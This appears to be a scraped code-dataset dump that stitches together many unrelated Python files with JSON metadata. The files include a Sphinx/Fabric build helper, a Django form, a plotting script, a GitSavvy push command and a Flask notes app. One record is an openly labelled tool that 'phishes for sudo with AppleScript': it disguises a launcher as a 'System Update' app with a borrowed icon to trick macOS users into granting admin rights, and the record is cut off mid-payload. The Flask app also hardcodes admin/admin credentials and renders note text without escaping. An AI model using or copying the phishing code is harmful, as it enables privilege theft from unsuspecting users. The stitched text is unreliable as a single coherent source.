if not userdocs.isdir():\n return # abort(\"Directory %s does not exist.\" % userdocs)\n args = ['sphinx-build', '-b', 'gettext']\n #~ args += cmdline_args\n # ~ args += ['-a'] # all files, not only outdated\n # ~ args += ['-P'] # no postmortem\n # ~ args += ['-Q'] # no output\n #~ if not env.tolerate_sphinx_warnings:\n # ~ args += ['-W'] # consider warnings as errors\n #~ args += ['-w',env.DOCSDIR.child('warnings.txt')]\n args += [userdocs]\n args += [userdocs.child(\"translations\")]\n cmd = ' '.join(args)\n local(cmd)\n\n\n@task(alias='rename')\ndef rename_data_url_friendly():\n data_dir = env.root_dir.child('docs', 'data')\n #~ print list(data_dir.listdir(names_only=True))\n print(list(data_dir.walk()))\n\n\ndef setup_babel_userdocs(babelcmd):\n \"\"\"Create userdocs .po files if necessary.\"\"\"\n userdocs = env.root_dir.child('userdocs')\n if not userdocs.isdir():\n return\n locale_dir = userdocs.child('translations')\n for domain in locale_dir.listdir('*.pot', names_only=True):\n domain = domain[:-4]\n for loc in env.languages:\n if loc != env.languages[0]:\n po_file = Path(locale_dir, loc, 'LC_MESSAGES', '%s.po' %\n domain)\n mo_file = Path(locale_dir, loc, 'LC_MESSAGES', '%s.mo' %\n domain)\n pot_file = Path(locale_dir, '%s.pot' % domain)\n if babelcmd == 'init_catalog' and po_file.exists():\n print(\"Skip %s because file exists.\" % po_file)\n #~ elif babelcmd == 'compile_catalog' and not mo_file.needs_update(po_file):\n #~ print \"Skip %s because newer than .po\" % mo_file\n else:\n args = [\"python\", \"setup.py\"]\n args += [babelcmd]\n args += [\"-l\", loc]\n args += [\"--domain\", domain]\n args += [\"-d\", locale_dir]\n #~ args += [ \"-o\" , po_file ]\n #~ if babelcmd == 'init_catalog':\n if babelcmd == 'compile_catalog':\n args += [\"-i\", po_file]\n else:\n args += [\"-i\", pot_file]\n cmd = ' '.join(args)\n #~ must_confirm(cmd)\n local(cmd)\n\n\n@task(alias='cmu')\ndef compile_catalog_userdocs():\n setup_babel_userdocs('compile_catalog')\n\n\ndef init_catalog_code():\n \"\"\"Create code .po files if necessary.\"\"\"\n from lino.core.site import to_locale\n locale_dir = env.locale_dir\n # locale_dir = get_locale_dir()\n if locale_dir is None:\n return\n locale_dir = Path(locale_dir)\n for loc in env.languages:\n if loc != 'en':\n f = locale_dir.child(loc, 'LC_MESSAGES', 'django.po')\n if f.exists():\n print(\"Skip %s because file exists.\" % f)\n else:\n args = [\"python\", \"setup.py\"]\n args += [\"init_catalog\"]\n args += [\"--domain django\"]\n args += [\"-l\", to_locale(loc)]\n args += [\"-d\", locale_dir]\n #~ args += [ \"-o\" , f ]\n args += [\"-i\", locale_dir.child('django.pot')]\n cmd = ' '.join(args)\n must_confirm(cmd)\n local(cmd)\n\n\ndef update_catalog_code():\n \"\"\"Update .po files from .pot file.\"\"\"\n from lino.core.site import to_locale\n locale_dir = env.locale_dir\n # locale_dir = get_locale_dir()\n if locale_dir is None:\n return\n locale_dir = Path(locale_dir)\n for loc in env.languages:\n if loc != env.languages[0]:\n args = [\"python\", \"setup.py\"]\n args += [\"update_catalog\"]\n args += [\"--domain django\"]\n #~ args += [ \"-d\" , locale_dir ]\n args += [\"-o\", locale_dir.child(loc, 'LC_MESSAGES', 'django.po')]\n args += [\"-i\", locale_dir.child(\"django.pot\")]\n args += [\"-l\", to_locale(loc)]\n cmd = ' '.join(args)\n #~ must_confirm(cmd)\n local(cmd)\n\n\n@task(alias='cm')\ndef compile_catalog():\n \"\"\"Compile .po files to .mo files.\"\"\"\n from lino.core.site import to_locale \n locale_dir = env.locale_dir\n # locale_dir = get_locale_dir()\n if locale_dir is None:\n return\n for loc in env.languages:\n if loc != env.languages[0]:\n args = [\"python\", \"setup.py\"]\n args += [\"compile_catalog\"]\n args += [\"-i\", locale_dir.child(loc, 'LC_MESSAGES', 'django.po')]\n args += [\"-o\", locale_dir.child(loc, 'LC_MESSAGES', 'django.mo')]\n args += [\"--domain django\"]\n #~ args += [ \"-d\" , locale_dir ]\n args += [\"-l\", to_locale(loc)]\n cmd = ' '.join(args)\n #~ must_confirm(cmd)\n local(cmd)\n\n\n@task(alias='mss')\ndef makescreenshots():\n \"\"\"generate screenshot .jpg files to gen/screenshots.\"\"\"\n run_in_demo_projects('makescreenshots', '--traceback')\n\n\n@task(alias='sss')\ndef syncscreenshots():\n \"\"\"synchronize gen/screenshots to userdocs/gen/screenshots.\"\"\"\n run_in_demo_projects('syncscreenshots', '--traceback',\n 'gen/screenshots', 'userdocs/gen/screenshots')\n\n\ndef sphinx_build(builder, docs_dir,\n cmdline_args=[], language=None, build_dir_cmd=None):\n args = ['sphinx-build', '-b', builder]\n args += cmdline_args\n # ~ args += ['-a'] # all files, not only outdated\n # ~ args += ['-P'] # no postmortem\n # ~ args += ['-Q'] # no output\n # build_dir = docs_dir.child(env.build_dir_name)\n build_dir = Path(env.build_dir_name)\n if language is not None:\n args += ['-D', 'language=' + language]\n # needed in select_lang.html template\n args += ['-A', 'language=' + language]\n if language != env.languages[0]:\n build_dir = build_dir.child(language)\n #~ print 20130726, build_dir\n if env.tolerate_sphinx_warnings:\n args += ['-w', 'warnings_%s.txt' % builder]\n else:\n args += ['-W'] # consider warnings as errors\n # args += ['-vvv'] # increase verbosity\n #~ args += ['-w'+Path(env.root_dir,'sphinx_doctest_warnings.txt')]\n args += ['.', build_dir]\n cmd = ' '.join(args)\n with lcd(docs_dir):\n local(cmd)\n if build_dir_cmd is not None:\n with lcd(build_dir):\n local(build_dir_cmd)\n\n\ndef sync_docs_data(docs_dir):\n build_dir = docs_dir.child(env.build_dir_name)\n for data in ('dl', 'data'):\n src = docs_dir.child(data).absolute()\n if src.isdir():\n target = build_dir.child('dl')\n target.mkdir()\n cmd = 'cp -ur %s %s' % (src, target.parent)\n local(cmd)\n if False:\n # according to http://mathiasbynens.be/notes/rel-shortcut-icon\n for n in ['favicon.ico']:\n src = docs_dir.child(n).absolute()\n if src.exists():\n target = build_dir.child(n)\n cmd = 'cp %s %s' % (src, target.parent)\n local(cmd)\n\n\n@task(alias='userdocs')\ndef build_userdocs(*cmdline_args):\n \"\"\"\n Deprecated. sphinx-build the userdocs tree in all languages\n \"\"\"\n if env.languages is None:\n return\n docs_dir = env.root_dir.child('userdocs')\n if not docs_dir.exists():\n return\n for lng in env.languages:\n sphinx_build('html', docs_dir, cmdline_args, lng)\n sync_docs_data(docs_dir)\n\n\n@task(alias='pdf')\ndef build_userdocs_pdf(*cmdline_args):\n if env.languages is None:\n return\n docs_dir = env.root_dir.child('userdocs')\n if not docs_dir.exists():\n return\n for lng in env.languages:\n sphinx_build('latex', docs_dir, cmdline_args,\n lng, build_dir_cmd='make all-pdf')\n sync_docs_data(docs_dir)\n\n\n@task(alias='linkcheck')\ndef sphinx_build_linkcheck(*cmdline_args):\n \"\"\"sphinxbuild -b linkcheck docs.\"\"\"\n docs_dir = env.root_dir.child('docs')\n if docs_dir.exists():\n sphinx_build('linkcheck', docs_dir, cmdline_args)\n docs_dir = env.root_dir.child('userdocs')\n if docs_dir.exists():\n lng = env.languages[0]\n #~ lng = env.userdocs_base_language\n sphinx_build('linkcheck', docs_dir, cmdline_args, lng)\n\n\ndef get_doc_trees():\n for rel_doc_tree in env.doc_trees:\n docs_dir = env.root_dir.child(rel_doc_tree)\n if not docs_dir.exists():\n msg = \"Directory %s does not exist.\" % docs_dir\n msg += \"\\nCheck your project's `doc_trees` setting.\"\n raise Exception(msg)\n yield docs_dir\n\n\ndef run_in_demo_projects(admin_cmd, *more):\n \"\"\"Run the given shell command in each demo project (see\n :attr:`env.demo_projects`).\n\n \"\"\"\n for mod in env.demo_projects:\n puts(\"-\" * 80)\n puts(\"In demo project {0}:\".format(mod))\n\n from importlib import import_module\n m = import_module(mod)\n # p = Path(m.__file__).parent.absolute()\n p = m.SITE.cache_dir or m.SITE.project_dir\n\n with lcd(p):\n args = [\"django-admin.py\"]\n args += [admin_cmd]\n args += more\n #~ args += [\"--noinput\"]\n args += [\"--settings=\" + mod]\n #~ args += [\" --pythonpath=%s\" % p.absolute()]\n cmd = \" \".join(args)\n local(cmd)\n\n\n\n\n\n@task(alias='ddt')\ndef double_dump_test():\n \"\"\"\n Perform a \"double dump test\" on every demo database.\n TODO: convert this to a Lino management command.\n \"\"\"\n raise Exception(\"Not yet converted after 20150129\")\n if len(env.demo_databases) == 0:\n return\n a = Path(env.temp_dir, 'a')\n b = Path(env.temp_dir, 'b')\n rmtree_after_confirm(a)\n rmtree_after_confirm(b)\n #~ if not confirm(\"This will possibly break the demo databases. Are you sure?\"):\n #~ return\n #~ a.mkdir()\n with lcd(env.temp_dir):\n for db in env.demo_databases:\n if a.exists():\n a.rmtree()\n if b.exists():\n b.rmtree()\n local(\"django-admin.py dump2py --settings=%s --traceback a\" % db)\n local(\n \"django-admin.py run --settings=%s --traceback a/restore.py\" %\n db)\n local(\"django-admin.py dump2py --settings=%s --traceback b\" % db)\n local(\"diff a b\")\n\n\n","repo_name":"miller2082/lino_polls","sub_path":"lib/python2.7/site-packages/atelier/fablib.py","file_name":"fablib.py","file_ext":"py","file_size_in_byte":17412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24429956654","text":" # Robby Sodhi\n # J.Bains\n # 2023\n # Constants file, useful methods/variables needed throughout the program\n\nimport datetime\n\nstock_data_database_path = \"stock_data.db\"\nuser_data_database_path = \"user_data.db\"\n\ndate_format = \"%Y-%m-%d\"\n\nstarting_balance = 50000\n\n\ndef getCurrentDate(format):\n # get the current time, turn it into a format string, then convert it back to a date time object (erases the time, we just want date)\n return datetime.datetime.strptime(datetime.datetime.now().strftime(format), format)\n\n\ndef find_first_occurence_in_2D_Array(arr, value):\n for i in arr:\n for x in i:\n if (x == value):\n return i\n return None\n","repo_name":"Robby-Sodhi/stock_market_manager_java","sub_path":"Server/serverGui + rest + ssdp + misc/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71568743760","text":"from django import forms\nfrom .models import Comment\nclass CommentForm(forms.ModelForm):\n author = forms.CharField(max_length=20, widget=forms.TextInput(attrs={\n \"class\": \"form-control\", \"id\": \"author\", \"placeholder\": \"Your Name\"\n }))\n body = forms.CharField(max_length=200, widget=forms.Textarea(attrs={\n \"class\":\"form-control\", \"id\": \"body\", \"placeholder\": \"Comment Here\"\n }))\n class Meta:\n model = Comment\n fields = ['author', 'body',]\n","repo_name":"ClintonCode20/Django-Blog-With-Ajax","sub_path":"blogapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"10350569280","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom random import random\n\ninit = []\nfinal = []\n\na = float(raw_input(\"Enter the grain parameter for hexagonal grains\\n\"))\n\nfor i in range(7):\n\tfor j in range(4):\n\t\tinit = init + [(a + a*(3**0.5)*i, a + 3*j*a)]\n\t\tinit = init + [(a - (3**0.5)*a/2 + a*(3**0.5)*i, a + a/2 + 3*j*a)]\n\t\tinit = init + [(a - (3**0.5)*a/2 + a*(3**0.5)*i, a + 3*a/2 + 3*j*a)]\n\t\tinit = init + [(a + a*(3**0.5)*i, a + 2*a + 3*j*a)]\n\t\t\n# print type(init[0])\n# print init[0]\n\nplot1 = plt.subplot(211)\nplt.axis('equal')\nplt.scatter(*zip(*init))\n\n\n\nfor i in init:\n\tfinal = final + [(i[0] + random()/2 ,i[1] + random()/2)]\n\n# print type(final[0])\n# print final[0]\n\nplot2 = plt.subplot(212)\nplt.axis('equal')\nplt.scatter(*zip(*final))\n\n\nplot1.set_title('Initial EBSD Mapping')\nplot2.set_title('Final EBSD Mapping')\n\nsum_xx = 0\nsum_yy = 0\n\nfor i in range(len(init)):\n\tsum_xx = sum_xx - ((init[i])[0] - (final[i])[0])\n\tsum_yy = sum_yy - ((init[i])[1] - (final[i])[1])\n\n\"\"\"\nSince the grain side lenght is assumed to be one unit xy displacement is the same as xx displacement \nand yx is the same as yy displacement\n\"\"\"\ndisp_xx = sum_xx/(a*len(init))\n#disp_xy = sum_xx/(a*len(init))\ndisp_yy = sum_yy/(a+len(init))\n#disp_yx = sum_yy/(a+len(init))\n\ndisplacement_tensor = [disp_xx,0,disp_yy,0]\ndisplacement_tensor_transpose = [disp_xx,0,disp_yy,0]\nstrain_tensor = []\n\nfor i in range(4):\n\tstrain_tensor = strain_tensor + [0.5*(displacement_tensor[i] + displacement_tensor_transpose[i])]\n\ntxt = 'epsilon_xx =' + str(round(strain_tensor[0],3))\n#txt_1 = 'epsilon_xy =' + str(round(strain_tensor[1],3))\ntxt_2 = 'epsilon_yy =' + str(round(strain_tensor[2],3))\n#txt_3 = 'epsilon_yx =' + str(round(strain_tensor[3],3))\n\n\nplt.figtext(0.67, 0.29, txt)\n#plt.figtext(0.67, 0.25, txt_1)\nplt.figtext(0.67, 0.21, txt_2)\n#plt.figtext(0.67, 0.17, txt_3)\n\nplt.show()\n\n\n","repo_name":"ankitkmr/Grain_Strain_Measurement","sub_path":"MSE313A_2.py","file_name":"MSE313A_2.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26866827491","text":"\"\"\"phishes for sudo with AppleScript\"\"\"\nimport json\nimport os\nimport plistlib\n\nfrom .general import (DEFAULT_COMMAND, app_installed, app_running, osascript,\n random_string)\n\ntry:\n input = raw_input\nexcept NameError:\n pass\n\nwith open(\"apps.json\") as json_file:\n APPS = json.load(json_file)\n\n__cve__ = \"\"\n__credits__ = \"thehappydinoa\"\n\n\ndef admin_prompt(app=None, icon_path=None, prompt=\"System Update\", command=\"echo hello\"):\n \"\"\"prompts with administrator privileges\"\"\"\n rand = random_string()\n print(\"\\nPrompting: \" + prompt)\n if app:\n if icon_path:\n app_path = \"Prompt.app\"\n zip_path = \"Prompt.app.zip\"\n if not os.path.exists(app_path) and os.path.exists(zip_path):\n os.system(\"unzip \" + zip_path)\n if os.path.exists(\"/Applications/\" + app):\n full_app_path = \"/Applications/\" + app\n else:\n full_app_path = \"~/Applications/\" + app\n plist = app_path + \"/Contents/Info.plist\"\n info = plistlib.readPlist(plist)\n info[\"CFBundleName\"] = prompt\n info[\"CFBundleIdentifier\"] = \"com.apple.ScriptEditor.id.\" + \\\n prompt.replace(\" \", \"\")\n plistlib.writePlist(info, plist)\n os.system(\n \"cp \\\"{icon_path}\\\" \\\"{app_path}/Contents/Resources/applet.icns\\\"; touch {app_path};\".format(icon_path=full_app_path + icon_path, app_path=app_path))\n payload = \"\"\"open {app_path} --args \"{command}; echo {success}\" \"{prompt}\" \"\"\".format(\n app_path=app_path, prompt=prompt, command=command.replace('\"', '\\\"'), success=rand)\n os.system(payload)\n print(\"Application Launched...\")\n return True\n else:\n payload = \"\"\"osascript <= r:\n cnt = 0\n for j in range(r):\n if arr[j] in st:\n cnt += 1\n if cnt >= 1 and r-cnt >= 2:\n print(''.join(arr))\n return\n for i in range(s, n-r+k+1):\n arr[k] = p[i]\n comb(n, r, k+1, i+1)\n\ncomb(C, L, 0, 0)","repo_name":"youngmin940629/AlgorithmStudy","sub_path":"알고리즘스터디/2021_11/1106/강민철/b1759_암호 만들기.py","file_name":"b1759_암호 만들기.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38311833378","text":"from functools import partial\n\nimport sublime\n\nfrom ...common import util\nfrom ..ui_mixins.quick_panel import show_branch_panel\nfrom ..ui_mixins.input_panel import show_single_line_input_panel\nfrom GitSavvy.core.base_commands import GsWindowCommand\nfrom GitSavvy.core.runtime import enqueue_on_worker, run_on_new_thread\nfrom GitSavvy.core.utils import show_actions_panel, noop\nfrom GitSavvy.core import store\n\n\n__all__ = (\n \"gs_push\",\n \"gs_push_to_branch\",\n \"gs_push_to_branch_name\",\n)\n\n\nMYPY = False\nif MYPY:\n from typing import Dict, Sequence, TypeVar\n from GitSavvy.core.base_commands import Args, GsCommand, Kont\n T = TypeVar(\"T\")\n\n\nEND_PUSH_MESSAGE = \"Push complete.\"\nCONFIRM_FORCE_PUSH = (\"You are about to `git push {}`. Would you \"\n \"like to proceed?\")\n\n\nclass PushMixin(GsWindowCommand):\n def guess_remote_to_push_to(self, available_remotes):\n # type: (Sequence[str]) -> str\n if len(available_remotes) == 0:\n raise RuntimeError(\"\")\n if len(available_remotes) == 1:\n return next(iter(available_remotes))\n\n last_remote_used = store.current_state(self.repo_path).get(\"last_remote_used_for_push\")\n if last_remote_used in available_remotes:\n return last_remote_used # type: ignore[return-value]\n\n defaults = dict(\n (key[:-12], val) # strip trailing \".pushdefault\" from key\n for key, val in (\n line.split()\n for line in self.git(\n \"config\",\n \"--get-regexp\",\n r\".*\\.pushdefault\",\n throw_on_error=False\n ).splitlines()\n )\n ) # type: Dict[str, str]\n for key in (defaults.get(\"gitsavvy\"), defaults.get(\"remote\"), \"fork\", \"origin\"):\n if key in available_remotes:\n return key # type: ignore[return-value]\n return next(iter(available_remotes))\n\n def do_push(\n self,\n remote,\n branch,\n force=False,\n force_with_lease=False,\n remote_branch=None,\n set_upstream=False\n ):\n # type: (str, str, bool, bool, str, bool) -> None\n \"\"\"\n Perform `git push remote branch`.\n \"\"\"\n if self.savvy_settings.get(\"confirm_force_push\", True):\n if force:\n if not sublime.ok_cancel_dialog(CONFIRM_FORCE_PUSH.format(\"--force\")):\n return\n elif force_with_lease:\n if not sublime.ok_cancel_dialog(CONFIRM_FORCE_PUSH.format(\"--force-with-lease\")):\n return\n\n self.window.status_message(\"Pushing {} to {}...\".format(branch, remote))\n self.push(\n remote,\n branch,\n remote_branch=remote_branch,\n force=force,\n force_with_lease=force_with_lease,\n set_upstream=set_upstream\n )\n self.window.status_message(END_PUSH_MESSAGE)\n util.view.refresh_gitsavvy_interfaces(self.window)\n\n\nclass gs_push(PushMixin):\n \"\"\"\n Push current branch.\n \"\"\"\n\n def run(self, local_branch_name=None, force=False, force_with_lease=False):\n # type: (str, bool, bool) -> None\n if local_branch_name:\n local_branch = self.get_local_branch_by_name(local_branch_name)\n if not local_branch:\n sublime.message_dialog(\"'{}' is not a local branch name.\")\n return\n else:\n local_branch = self.get_current_branch()\n if not local_branch:\n sublime.message_dialog(\"Can't push a detached HEAD.\")\n return\n\n upstream = local_branch.upstream\n if upstream:\n remote, remote_branch = upstream.remote, upstream.branch\n kont = partial(\n enqueue_on_worker,\n self.do_push,\n remote,\n local_branch.name,\n remote_branch=remote_branch,\n force=force,\n force_with_lease=force_with_lease\n )\n if not force and not force_with_lease and \"behind\" in upstream.status:\n show_actions_panel(self.window, [\n noop(\n \"Abort, '{}' is behind '{}/{}'.\"\n .format(local_branch.name, remote, remote_branch)\n ),\n (\n \"Forcefully push.\",\n partial(kont, force_with_lease=True)\n )\n ])\n return\n else:\n kont()\n\n else:\n self.window.run_command(\"gs_push_to_branch_name\", {\n \"local_branch_name\": local_branch.name,\n \"set_upstream\": True,\n \"force\": force,\n \"force_with_lease\": force_with_lease\n })\n\n\ndef take_current_branch_name(cmd, args, done):\n # type: (GsWindowCommand, Args, Kont) -> None\n current_branch_name = cmd.get_current_branch_name()\n if current_branch_name:\n done(current_branch_name)\n else:\n cmd.window.status_message(\"Can't push a detached HEAD.\")\n\n\ndef ask_for_remote(cmd, args, done):\n # type: (PushMixin, Args, Kont) -> None\n available_remotes = list(cmd.get_remotes())\n if len(available_remotes) == 0:\n show_actions_panel(cmd.window, [noop(\"There are no remotes available.\")])\n return\n\n remote = cmd.guess_remote_to_push_to(available_remotes)\n current_branch_name = args[\"local_branch_name\"]\n\n show_actions_panel(cmd.window, [\n (\n \"Push to '{}/{}'\".format(remote, current_branch_name),\n lambda: done(remote, branch_name=current_branch_name)\n ),\n (\n \"Configure where to push to...\",\n lambda: (\n show_actions_panel(\n cmd.window,\n [\n (r, partial(done, r, remember_used_remote=True))\n for r in available_remotes\n ],\n select=available_remotes.index(remote)\n )\n if len(available_remotes) > 1\n else done(remote)\n )\n ),\n ])\n\n\ndef ask_for_branch_name(caption, initial_text):\n def handler(cmd, args, done):\n # type: (GsCommand, Args, Kont) -> None\n show_single_line_input_panel(\n caption(args),\n initial_text(args),\n done\n )\n return handler\n\n\ndef ask_for_remote_branch(self, args, done):\n # type: (GsCommand, Args, Kont) -> None\n show_branch_panel(done, ask_remote_first=True)\n\n\nclass gs_push_to_branch_name(PushMixin):\n \"\"\"\n Prompt for remote and remote branch name, then push.\n \"\"\"\n defaults = {\n \"local_branch_name\": take_current_branch_name,\n \"remote\": ask_for_remote,\n \"branch_name\": ask_for_branch_name(\n caption=lambda args: \"Push to {}/\".format(args[\"remote\"]),\n initial_text=lambda args: args[\"local_branch_name\"]\n )\n }\n\n def run(\n self,\n local_branch_name,\n remote,\n branch_name,\n set_upstream=False,\n force=False,\n force_with_lease=False,\n remember_used_remote=False,\n ):\n # type: (str, str, str, bool, bool, bool, bool) -> None\n if remember_used_remote:\n run_on_new_thread(self.git, \"config\", \"--local\", \"gitsavvy.pushdefault\", remote)\n store.update_state(self.repo_path, {\"last_remote_used_for_push\": remote})\n\n enqueue_on_worker(\n self.do_push,\n remote,\n local_branch_name,\n remote_branch=branch_name,\n force=force,\n force_with_lease=force_with_lease,\n set_upstream=set_upstream\n )\n\n\nclass gs_push_to_branch(PushMixin):\n \"\"\"\n Through a series of panels, allow the user to push to a specific remote branch.\n \"\"\"\n defaults = {\n \"local_branch_name\": take_current_branch_name,\n \"remote_branch\": ask_for_remote_branch\n }\n\n def run(self, local_branch_name, remote_branch):\n # type: (str, str) -> None\n remote, branch_name = remote_branch.split(\"/\", 1)\n enqueue_on_worker(\n self.do_push,\n remote,\n local_branch_name,\n remote_branch=branch_name\n )\n","repo_name":"timbrel/GitSavvy","sub_path":"core/commands/push.py","file_name":"push.py","file_ext":"py","file_size_in_byte":8418,"program_lang":"python","lang":"en","doc_type":"code","stars":1895,"dataset":"github-code","pt":"3"} +{"seq_id":"35385670130","text":"import sqlite3\nimport re\nfrom flask import Flask, request, session, g, \\\n redirect, url_for, render_template\nfrom contextlib import closing\n\n# configuration\nDATABASE = 'database.db'\nDEBUG = True\nSECRET_KEY = 'RGINQ4T348TB8GQ'\nUSERNAME = 'admin'\nPASSWORD = 'admin'\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\n####### Database\n\ndef connect_db():\n return sqlite3.connect(app.config['DATABASE'])\n\ndef init_db():\n with closing(connect_db()) as db:\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n@app.before_request\ndef before_request():\n g.db = connect_db()\n\n@app.teardown_request\ndef teardown_request(exception):\n db = getattr(g, 'db', None)\n if db is not None:\n db.close()\n\n#######\n\n@app.route(\"/\", methods=['GET','POST'])\ndef index():\n if request.method == 'POST':\n results = g.db.execute('SELECT * FROM notes WHERE TITLE LIKE ? OR DESCRIPTION LIKE ? ORDER BY TITLE', \\\n ['%'+request.form['search']+'%', '%'+request.form['search']+'%'])\n else:\n results = g.db.execute('SELECT * FROM notes ORDER BY TITLE ')\n notes=[]\n for row in results:\n new_row=[]\n for column in range(len(row)):\n if column == 2:\n new_row.append(markup(row[column]))\n else:\n new_row.append(row[column])\n notes.append(new_row)\n return render_template('index.html', notes=notes)\n\n@app.route(\"/login\", methods=['POST'])\ndef login():\n if request.form['username'] == app.config['USERNAME']:\n if request.form['password'] == app.config['PASSWORD']:\n session['logged_in'] = True\n return redirect(url_for('index'))\n\n@app.route(\"/logout\")\ndef logout():\n session.pop('logged_in', None)\n session.pop('username', None)\n return redirect(url_for('index'))\n\n@app.route('/edit/', methods=['GET','POST'])\ndef edit(index):\n if request.method == 'POST':\n g.db.execute(\"UPDATE notes SET TITLE=?,DESCRIPTION=?,TSTAMP=CURRENT_TIMESTAMP WHERE ID=?\", [request.form['title'],request.form['description'],index])\n g.db.commit()\n return redirect(url_for('index'))\n else:\n results = g.db.execute(\"SELECT TITLE, DESCRIPTION FROM notes WHERE ID=?\", [index])\n return render_template(\"edit.html\", notes=results)\n\n@app.route(\"/view/\")\ndef view(index):\n results = g.db.execute(\"SELECT * FROM notes WHERE ID=?\", [index])\n notes=[]\n for row in results:\n new_row=[]\n for column in range(len(row)):\n if column == 2:\n new_row.append(markup(row[column]))\n else:\n new_row.append(row[column])\n notes.append(new_row)\n return render_template(\"view.html\", notes=notes)\n\n@app.route(\"/add\", methods=['POST'])\ndef add():\n title, description = request.form['title'], request.form['description']\n g.db.execute(\"INSERT INTO notes (TITLE, DESCRIPTION) VALUES (?, ?)\", [title, description])\n g.db.commit()\n return redirect(url_for('index'))\n\n@app.route(\"/delete/\")\ndef delete(index):\n g.db.execute(\"DELETE FROM notes WHERE ID=?\", [index])\n g.db.commit()\n return redirect(url_for('index'))\n\ndef markup(content):\n new_content = []\n is_fixed = False\n is_list = False\n for line in content.splitlines():\n if line.startswith(\"*#BEGIN_FIXED\"):\n is_fixed = True\n line = \"
\\n
\"+line[13:]\n        elif line.endswith(\"*#END_FIXED\"):\n            is_fixed = False\n            line = line[:len(line)-11]+\"
\"\n elif is_fixed:\n new_content.append(line)\n continue\n\n if line.startswith(\"-\"):\n if not is_list:\n new_content.append(\"
    \")\n is_list = True\n line = \"
  • \"+line[1:]+\"
  • \"\n elif is_list:\n is_list = False\n new_content.append(\"
\")\n\n if line.startswith(\"**\"):\n line = \"

\"+line[2:]+\"

\"\n elif line.startswith(\"*\"):\n line = \"

\"+line[1:]+\"

\"\n\n line = re.sub(r'\\[\\[(.*)\\]\\]',r'\\1',line)\n\n new_content.append(line)\n return \"\\n\".join(new_content)\n\n\n\nif __name__ == \"__main__\":\n init_db()\n app.run()\n\n#TODO: Search symbol","repo_name":"CruskitKing/Massey-Work","sub_path":"159.352/352-Ass2/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40077038272","text":"# Calculate the sum of all numbers from 1 to a given number\ndef sum(num):\n sum = 0\n for i in range(1, num + 1):\n sum += i\n\n print(sum)\n\nnum = int(input(\"enter a number: \"))\n\nsum(num)","repo_name":"mbclause/Python-Exercises","sub_path":"control flow exercises/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18334314431","text":"import sys\nimport math\nfrom collections import defaultdict\nfrom collections import deque\n\nsys.setrecursionlimit(100000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef main():\n N = NI()\n A = NLI()\n\n S = sum(A)\n if S % 10:\n print(\"No\")\n exit()\n\n X = S // 10\n\n AA = A + A\n que = deque()\n now = 0\n for a in AA:\n while que and now > X:\n d = que.popleft()\n now -= d\n\n if now < X:\n que.append(a)\n now += a\n\n if now == X:\n print(\"Yes\")\n exit()\n\n print(\"No\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Mao-beta/AtCoder","sub_path":"tenkei90/tenkei90_076.py","file_name":"tenkei90_076.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20725339676","text":"from server.database import get_collection\nfrom typing import Optional\nimport bson\n\nimage_collection = get_collection('docesWebApi', 'images')\n\n# Helpers\ndef images_helper(image) -> dict:\n return {\n \"page\": image[\"page\"],\n \"name\": image[\"name\"],\n \"image\": image[\"image\"],\n \"path\": image[\"path\"],\n }\n\ndef encode_utf(string: str) -> str:\n return string.encode()\n\n# CRUD\n\nasync def add_new_image(image_data: dict) -> dict:\n new_data = {\n \"page\": image_data[\"page\"],\n \"name\": image_data[\"name\"],\n \"image\": image_data[\"image\"],\n \"path\": image_data[\"path\"],\n }\n image = await image_collection.insert_one(new_data)\n new_image = await image_collection.find_one({\"_id\": image.inserted_id})\n if new_image:\n return images_helper(new_image)\n return None\n\nasync def get_all_images_in_page(page: str) -> list:\n list_images = []\n async for image in image_collection.find({\"page\": page}):\n list_images.append(images_helper(image))\n return list_images\n\nasync def get_image_by_name(page: str, name: str) -> dict:\n page = encode_utf(page)\n name = encode_utf(name)\n image = await image_collection.find_one({\"page\": page, \"name\": name})\n if image:\n return images_helper(image)\n return None\n\nasync def get_image_by_name_and_image(page: str, name: str, image:str) -> dict:\n page = encode_utf(page)\n name = encode_utf(name)\n image = encode_utf(image)\n image = await image_collection.find_one({\"page\": page , \"name\": name, \"image\": image})\n if image:\n return images_helper(image)\n return None\n","repo_name":"renatohkuramoto/docesWebApi","sub_path":"server/collections/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37518713865","text":"from __future__ import unicode_literals, absolute_import, print_function\n\nfrom twisted.internet import defer\nfrom txmsgpackrpc.client import connect\n\nfrom pprint import pformat\n\n@defer.inlineCallbacks\ndef call_get_schedule(uuid, num):\n\tprint(\"Getting schedule for uuid: {}\".format(uuid))\n\ttry:\n\t\tc = yield connect('localhost', 18080, connectTimeout=5, waitTimeout=5)\n\n\t\tdata = {\n\t\t\t'uuid':uuid,\n\t\t\t'num':num\n\t\t}\n\n\t\tres = yield c.createRequest('get_schedule', 